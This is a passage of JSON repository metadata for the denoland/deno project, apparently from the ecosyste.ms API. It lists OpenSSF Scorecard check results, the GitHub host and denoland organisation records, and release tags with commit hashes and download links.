10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1"